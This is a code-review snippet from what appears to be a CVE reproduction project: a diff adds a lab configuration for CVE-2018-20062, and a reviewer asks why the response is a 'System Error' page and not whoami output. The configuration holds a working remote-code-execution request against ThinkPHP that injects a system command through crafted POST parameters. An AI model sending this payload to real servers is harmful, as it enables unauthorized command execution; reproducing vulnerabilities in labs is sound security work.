CVE-2018-20062/cvex.yml

```diff
@@ -0,0 +1,8 @@
+blueprint: ubuntu2204-ubuntu2204
+ubuntu1:
+  playbook: ubuntu1.yml
+ubuntu2:
+  playbook: ubuntu2.yml
+  trace: "curl"
+  command:
+    - "curl -d \"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami\" http://%ubuntu1%/public/index.php?s=captcha"
```

Comment:
Should I see the result of whoami execution? I don't see it anywhere. This command returns a loong page:

> <!DOCTYPE html>
> <html>
> <head>
>     <meta charset="UTF-8">
>     <title>System Error</title>
>     <meta name="robots" content="noindex,nofollow" />
>     <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
>     <style>
>         /* Base */
>         body {
>             color: #333;
>             font: 14px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif;
>             margin: 0;
>             padding: 0 20px 20px;
>             word-break: break-word;
>         }
> ...

Is it OK that it shows "System Error"?